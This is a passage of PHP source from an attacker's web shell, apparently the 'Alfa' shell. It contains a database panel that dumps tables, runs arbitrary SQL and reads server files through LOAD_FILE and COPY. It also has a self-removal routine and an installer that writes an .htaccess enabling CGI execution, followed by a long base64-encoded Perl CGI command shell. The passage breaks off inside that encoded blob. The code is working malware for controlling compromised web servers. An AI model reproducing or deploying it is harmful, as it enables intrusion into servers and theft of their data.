2637. }
2638. function setCharset($str) {
2639. switch($this->type) {
2640. case 'mysql':
2641. if(function_exists('mysql_set_charset'))
2642. return @mysql_set_charset($str, $this->link);
2643. else
2644. $this->query('SET CHARSET '.$str);
2645. break;
2646. case 'pgsql':
2647. return @pg_set_client_encoding($this->link, $str);
2648. break;
2649. }
2650. return false;
2651. }
2652. function loadFile($str) {
2653. switch($this->type) {
2654. case 'mysql':
2655. return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
2656. break;
2657. case 'pgsql':
2658. $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
2659. $r=array();
2660. while($i=$this->fetch())
2661. $r[] = $i['file'];
2662. $this->query('drop table wso2');
2663. return array('file'=>implode("\n",$r));
2664. break;
2665. }
2666. return false;
2667. }
2668. function dump($table, $fp = false) {
2669. switch($this->type) {
2670. case 'mysql':
2671. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
2672. $create = mysql_fetch_array($res);
2673. $sql = $create[1].";\n";
2674. if($fp) fwrite($fp, $sql); else echo($sql);
2675. $this->query('SELECT * FROM `'.$table.'`');
2676. $head = true;
2677. while($item = $this->fetch()) {
2678. $columns = array();
2679. foreach($item as $k=>$v) {
2680. if($v == null)
2681. $item[$k] = "NULL";
2682. elseif(is_numeric($v))
2683. $item[$k] = $v;
2684. else
2685. $item[$k] = "'".@mysql_real_escape_string($v)."'";
2686. $columns[] = "`".$k."`";
2687. }
2688. if($head) {
2689. $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
2690. $head = false;
2691. } else
2692. $sql = "\n\t,(".implode(", ", $item).')';
2693. if($fp) fwrite($fp, $sql); else echo($sql);
2694. }
2695. if(!$head)
2696. if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
2697. break;
2698. case 'pgsql':
2699. $this->query('SELECT * FROM '.$table);
2700. while($item = $this->fetch()) {
2701. $columns = array();
2702. foreach($item as $k=>$v) {
2703. $item[$k] = "'".addslashes($v)."'";
2704. $columns[] = $k;
2705. }
2706. $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
2707. if($fp) fwrite($fp, $sql); else echo($sql);
2708. }
2709. break;
2710. }
2711. return false;
2712. }
2713. };
2714. $db = new DbClass($_POST['type']);
2715. if(@$_POST['alfa2']=='download') {
2716. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
2717. $db->selectdb($_POST['sql_base']);
2718. switch($_POST['charset']) {
2719. case "Windows-1251": $db->setCharset('calfa1251'); break;
2720. case "UTF-8": $db->setCharset('utf8'); break;
2721. case "KOI8-R": $db->setCharset('koi8r'); break;
2722. case "KOI8-U": $db->setCharset('koi8u'); break;
2723. case "calfa866": $db->setCharset('calfa866'); break;
2724. }
2725. if(empty($_POST['file'])) {
2726. ob_start("ob_gzhandler", 4096);
2727. header("Content-Disposition: attachment; filename=dump.sql");
2728. header("Content-Type: text/plain");
2729. foreach($_POST['tbl'] as $v)
2730. $db->dump($v);
2731. exit;
2732. } elseif($fp = @fopen($_POST['file'], 'w')) {
2733. foreach($_POST['tbl'] as $v)
2734. $db->dump($v, $fp);
2735. fclose($fp);
2736. unset($_POST['alfa2']);
2737. } else
2738. die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
2739. }
2740. alfahead();
2741. echo "
2742. <div class=header>
2743. <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
2744. <td><font color=\"#ffffff\"><b>TYPE</b></font></td><td><font color=\"#ffffff\"><b>HOST</b></font></td><td><font color=\"#ffffff\"><b>DB USER</b></font></td><td><font color=\"#ffffff\"><b>DB PASS</b></font></td><td><font color=\"#ffffff\"><b>DB NAME</b></font></td><td></td></tr><tr>
2745. <input type=hidden name=a value=Sql><input type=hidden name=alfa1 value='query'><input type=hidden name=alfa2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
2746. <td><select name='type'><option value='mysql' ";
2747. if(@$_POST['type']=='mysql')echo 'selected';
2748. echo ">MySql</option><option value='pgsql' ";
2749. if(@$_POST['type']=='pgsql')echo 'selected';
2750. echo ">PostgreSql</option></select></td>
2751. <td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
2752. <td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
2753. <td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
2754. $tmp = "<input type=text name=sql_base value=''>";
2755. if(isset($_POST['sql_host'])){
2756. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
2757. switch($_POST['charset']) {
2758. case "Windows-1251": $db->setCharset('calfa1251'); break;
2759. case "UTF-8": $db->setCharset('utf8'); break;
2760. case "KOI8-R": $db->setCharset('koi8r'); break;
2761. case "KOI8-U": $db->setCharset('koi8u'); break;
2762. case "calfa866": $db->setCharset('calfa866'); break;
2763. }
2764. $db->listDbs();
2765. echo "<select name=sql_base><option value=''></option>";
2766. while($item = $db->fetch()) {
2767. list($key, $value) = each($item);
2768. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
2769. }
2770. echo '</select>';
2771. }
2772. else echo $tmp;
2773. }else
2774. echo $tmp;
2775. echo "</td>
2776. <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
2777. <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <font color=\"#ffffff\"><b>count the number of rows</b></font></td>
2778. </tr>
2779. </table>
2780. <script>
2781. s_db='".@addslashes($_POST['sql_base'])."';
2782. function fs(f) {
2783. if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
2784. if(f.alfa1) f.alfa1.value='';
2785. if(f.alfa2) f.alfa2.value='';
2786. if(f.alfa3) f.alfa3.value='';
2787. }
2788. }
2789. function st(t,l) {
2790. d.sf.alfa1.value = 'select';
2791. d.sf.alfa2.value = t;
2792. if(l && d.sf.alfa3) d.sf.alfa3.value = l;
2793. d.sf.submit();
2794. }
2795. function is() {
2796. for(i=0;i<d.sf.elements['tbl[]'].length;++i)
2797. d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
2798. }
2799. </script>";
2800. if(isset($db) && $db->link){
2801. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
2802. if(!empty($_POST['sql_base'])){
2803. $db->selectdb($_POST['sql_base']);
2804. echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
2805. $tbls_res = $db->listTables();
2806. while($item = $db->fetch($tbls_res)) {
2807. list($key, $value) = each($item);
2808. if(!empty($_POST['sql_count']))
2809. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
2810. $value = htmlspecialchars($value);
2811. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
2812. }
2813. echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.alfa2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
2814. if(@$_POST['alfa1'] == 'select') {
2815. $_POST['alfa1'] = 'query';
2816. $_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
2817. $db->query('SELECT COUNT(*) as n FROM ' . $_POST['alfa2']);
2818. $num = $db->fetch();
2819. $pages = ceil($num['n'] / 30);
2820. echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['alfa2'] . "\", d.sf.alfa3.value)}</script><span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
2821. echo " of $pages";
2822. if($_POST['alfa3'] > 1)
2823. echo " <a href=# onclick='st(\"" . $_POST['alfa2'] . '", ' . ($_POST['alfa3']-1) . ")'>&lt; Prev</a>";
2824. if($_POST['alfa3'] < $pages)
2825. echo " <a href=# onclick='st(\"" . $_POST['alfa2'] . '", ' . ($_POST['alfa3']+1) . ")'>Next &gt;</a>";
2826. $_POST['alfa3']--;
2827. if($_POST['type']=='pgsql')
2828. $_POST['alfa2'] = 'SELECT * FROM '.$_POST['alfa2'].' LIMIT 30 OFFSET '.($_POST['alfa3']*30);
2829. else
2830. $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
2831. echo "<br><br>";
2832. }
2833. if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
2834. $db->query(@$_POST['alfa2']);
2835. if($db->res !== false) {
2836. $title = false;
2837. echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
2838. $line = 1;
2839. while($item = $db->fetch()) {
2840. if(!$title) {
2841. echo '<tr>';
2842. foreach($item as $key => $value)
2843. echo '<th>'.$key.'</th>';
2844. reset($item);
2845. $title=true;
2846. echo '</tr><tr>';
2847. $line = 2;
2848. }
2849. echo '<tr class="l'.$line.'">';
2850. $line = $line==1?2:1;
2851. foreach($item as $key => $value) {
2852. if($value == null)
2853. echo '<td><i>null</i></td>';
2854. else
2855. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
2856. }
2857. echo '</tr>';
2858. }
2859. echo '</table>';
2860. } else {
2861. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
2862. }
2863. }
2864. echo "<br></form><form onsubmit='d.sf.alfa1.value=\"query\";d.sf.alfa2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
2865. if(!empty($_POST['alfa2']) && ($_POST['alfa1'] != 'loadfile'))
2866. echo htmlspecialchars($_POST['alfa2']);
2867. echo "</textarea><br/><input type=submit value='Execute'>";
2868. echo "</td></tr>";
2869. }
2870. echo "</table></form><br/>";
2871. if($_POST['type']=='mysql') {
2872. $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
2873. if($db->fetch())
2874. echo "<form onsubmit='d.sf.alfa1.value=\"loadfile\";document.sf.alfa2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
2875. }
2876. if(@$_POST['alfa1'] == 'loadfile') {
2877. $file = $db->loadFile($_POST['alfa2']);
2878. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
2879. }
2880. } else {
2881. echo htmlspecialchars($db->error());
2882. }
2883. echo '</div>';
2884. alfafooter();
2885. }
2886. function alfaselfrm()
2887. {
2888. if($_POST['alfa1'] == 'yes')
2889. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
2890. die('<b>Shell has been removed</i> :)</b>');
2891. else
2892. echo 'unlink error!';
2893. if($_POST['alfa1'] != 'yes')
2894. alfahead();
2895. echo "<div class=header><pre class=ml1 style='margin-top:5px'>";
2896. echo "
2897. <center><img height=\"300\" width=\"450\" src=\"http://iran.grn.cc/alfa-iran.jpg\">
2898. </font>";
2899. echo '<br><font color=white><b>Are you kidding me ?? Do you really want to delete this shell??</b></font><br><a href=# onclick="g(null,null,\'yes\')">Yes</a>';
2900. echo '</div>';
2901. alfaFooter();
2902. }
2903. function alfacgishell(){
2904. alfahead();
2905. echo '<div class=header>';
2906. mkdir('cgialfa',0755);
2907. chdir('cgialfa');
2908. $solevisible7 = '.htaccess';
2909. $solevisible6 = "$solevisible7";
2910. $solevisible4 = fopen ($solevisible6 ,'w') or die ('ERROR!!!');
2911. $solevisible5 = 'Options FollowSymLinks MultiViews Indexes ExecCGI
2912. AddType application/x-httpd-cgi .alfa
2913. AddHandler cgi-script .alfa
2914. AddHandler cgi-script .alfa';
2915. fwrite ( $solevisible4 ,$solevisible5 ) ;
2916. fclose ($solevisible4);
2917. $solevisible3 = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyAgICogICAgKiAgICAgICAqKioqKioqICAgICogICAgICAgKioqKioqKiAqKioqKioqICAgICAgICAqICAgICAqIA0KIyAgKiAqICAgKiAgICAgICAqICAgICAgICAgKiAqICAgICAgICAgKiAgICAqICAgICAgICAgKiogICAqKiAgICoqIA0KIyAqICAgKiAgKiAgICAgICAqICAgICAgICAqICAgKiAgICAgICAgKiAgICAqICAgICAgICAqICAqICAqICogKiAqIA0KIyogICAgICogKiAgICAgICAqKioqKiAgICogICAgICogICAgICAgKiAgICAqKioqKiAgICogICAgKiAqICAqICAqIA0KIyoqKioqKiogKiAgICAgICAqICAgICAgICoqKioqKiogICAgICAgKiAgICAqICAgICAgICoqKioqKiAqICAgICAqIA0KIyogICAgICogKiAgICAgICAqICAgICAgICogICAgICogICAgICAgKiAgICAqICAgICAgICogICAgKiAqICAgICAqIA0KIyogICAgICogKioqKioqKiAqICAgICAgICogICAgICogICAgICAgKiAgICAqKioqKioqICogICAgKiAqICAgICAqIA0KIw0KIyBzb2xldmlzaWJsZUBnbWFpbC5jb20JDQojIHNvbGUgc2FkICYgaW52aXNpYmxlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQokUGFzc3dvcmQgPSAiIjsJCQ0KDQokV2luTlQgPSAwOwkJCQ0KDQokTlRDbWRTZXAgPSAiJiI7CQkNCiRVbml4Q21kU2VwID0gIjsiOwkJDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkDQoNCg0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsJCSMgSWYgdGhpcyBpcyAxLCB0aGVuIGRhdGEgaXMgc2VudCB0byB0aGUNCg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUgVU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDogInB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUmVhZFBhcnNlIA0Kew0KCWxvY2FsICgqaW4pID0gQF8gaWYgQF87DQoJbG9jYWwgKCRpLCAkbG9jLCAka2V5LCAkdmFsKTsNCgkNCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsNCg0KCWlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpDQoJew0KCQkkaW4gPSAkRU5WeydRVUVSWV9TVFJJTkcnfTsNCgl9DQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpDQoJew0KCQliaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7DQoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQoJfQ0KDQoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQ0KCWlmKCRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvKQ0KCXsNCgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyANCgkJQGxpc3QgPSBzcGxpdCgvJEJvdW5kYXJ5LywgJGluKTsgDQoJCSRIZWFkZXJCb2R5ID0gJGxpc3RbMV07DQoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsNCgkJJEhlYWRlciA9ICRgOw0KCQkkQm9keSA9ICQnOw0KIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQ0KCQkkaW57J2ZpbGVkYXRhJ30gPSAkQm9keTsNCgkJJEhlYWRlciA9fiAvZmlsZW5hbWU9XCIoLispXCIvOyANCgkJJGlueydmJ30gPSAkMTsgDQoJCSRpbnsnZid9ID1+IHMvXCIvL2c7DQoJCSRpbnsnZid9ID1+IHMvXHMvL2c7DQoNCgkJIyBwYXJzZSB0cmFpbGVyDQoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspDQoJCXsgDQoJCQkkbGlzdFskaV0gPX4gcy9eLituYW1lPSQvLzsNCgkJCSRsaXN0WyRpXSA9fiAvXCIoXHcrKVwiLzsNCgkJCSRrZXkgPSAkMTsNCgkJCSR2YWwgPSAkJzsNCgkJCSR2YWwgPX4gcy8oXihcclxuXHJcbnxcblxuKSl8KFxyXG4kfFxuJCkvL2c7DQoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9ID0gJHZhbDsgDQoJCX0NCgl9DQoJZWxzZSAjIHN0YW5kYXJkIHBvc3QgZGF0YSAodXJsIGVuY29kZWQsIG5vdCBtdWx0aXBhcnQpDQoJew0KCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7DQoJCWZvcmVhY2ggJGkgKDAgLi4gJCNpbikNCgkJew0KCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsNCgkJCSgka2V5LCAkdmFsKSA9IHNwbGl0KC89LywgJGluWyRpXSwgMik7DQoJCQkka2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSRpbnska2V5fSAuPSAiXDAiIGlmIChkZWZpbmVkKCRpbnska2V5fSkpOw0KCQkJJGlueyRrZXl9IC49ICR2YWw7DQoJCX0NCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludFBhZ2VIZWFkZXINCnsNCgkkRW5jb2RlZEN1cnJlbnREaXIgPSAkQ3VycmVudERpcjsNCgkkRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOw0KCXByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOw0KCXByaW50IDw8RU5EOw0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5zb2xldmlzaWJsZSBjZ2kgc2hlbGw8L3RpdGxlPg0KJEh0bWxNZXRhSGVhZGVyDQoNCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJzb2xldmlzaWJsZSxhbGZhIHRlYW0sc29sZSBzYWQsaW52aXNpYmxlIj4NCjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJzb2xldmlzaWJsZSxhbGZhIHRlYW0sc29sZSBzYWQsaW52aXNpYmxlIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjMDAwMDAwIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRkZGRkYiPg0KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8dHI+DQo8Zm9udCBjb2xvcj0icmVkIj48Yj5jb2RlZCBieSBzb2xlIHNhZCAmIGludmlzaWJsZSB+IHNvbGV2aXNpYmxlW2F0XWdtYWlsLmNvbTwvYj48L2ZvbnQ+DQo8dGQgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJjZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIiBjb2xvcj0iI2ZmMDAwMCI+IzwvZm9udD48L2I+PC90ZD4NCjx0ZCBiZ2NvbG9yPSIjMDAwMDAwIiB3aWR0aD0iOTglIj48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj48Yj4gDQo8Zm9udCBjb2xvcj0iIzIyRTIyOCI+PGI+c29sZXZpc2libGUgY2dpIHNoZWxsPC9iPjwvZm9udD4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkIGNvbHNwYW49IjIiIGJnY29sb3I9IiMwMDAwMDAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPg0KDQo8L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8L3RhYmxlPg0KDQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8cHJlPjxjZW50ZXI+PGltZyBib3JkZXI9IjAiIHNyYz0iaHR0cDovL3NvbGUtc2FkLnBlcnNpYW5naWcuY29tL2ltYWdlL2ZhcnZhaGFyLnBuZyI+PC9jZW50ZXI+PC9wcmU+PGJyPjxicj48L2ZvbnQ+DQokOw0KIycNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQpUcnlpbmcgJFNlcnZlck5hbWUuLi48YnI+DQpDb25uZWN0ZWQgdG8gJFNlcnZlck5hbWU8YnI+DQpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dPGJyPg0KPGZvbnQgY29sb3I9IiMyMkUyMjgiPjxiPmNvZGVkIGJ5IHNvbGUgc2FkICYgaW52aXNpYmxlIFtBTEZBIFRFYU1dPGI+PC9mb250Pjxicj4NCjxmb250IGNvbG9yPSJyZWQiPjxiPkNvbnRhY3QgOiBzb2xldmlzaWJsZVthdF1nbWFpbC5jb20gPC9iPjwvZm9udD4NCjxjb2RlPiRNZXNzYWdlDQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5GYWlsZWRNZXNzYWdlDQp7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxicj5sb2dpbjogYWRtaW48YnI+DQpwYXNzd29yZDo8YnI+DQpMb2dpbiBpbmNvcnJlY3Q8YnI+PGJyPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRm9ybQ0Kew0KCXByaW50IDw8RU5EOw0KDQo8Y29kZT4NCg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0ibG9naW4iPg0KPC9mb250Pg0KPGZvbnQgc2l6ZT0iMyI+DQpVc2VyIDogPGZvbnQgY29sb3I9IiMyMkUyMjgiPjxiPnJvb3Q8L2ZvbnQ+PGJyPg0KUGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJcHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBHZXRDb29raWVzDQp7DQoJQGh0dHBjb29raWVzID0gc3BsaXQoLzsgLywkRU5WeydIVFRQX0NPT0tJRSd9KTsNCglmb3JlYWNoICRjb29raWUoQGh0dHBjb29raWVzKQ0KCXsNCgkJKCRpZCwgJHZhbCkgPSBzcGxpdCgvPS8sICRjb29raWUpOw0KCQkkQ29va2llc3skaWR9ID0gJHZhbDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBlcmZvcm1Mb2dvdXQNCnsNCglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llDQoJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCSZQcmludExvZ291dFNjcmVlbjsNCg0KCSZQcmludExvZ2luU2NyZWVuOw0KCSZQcmludExvZ2luRm9ybTsNCgkmUHJpbnRQYWdlRm9vdGVyOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS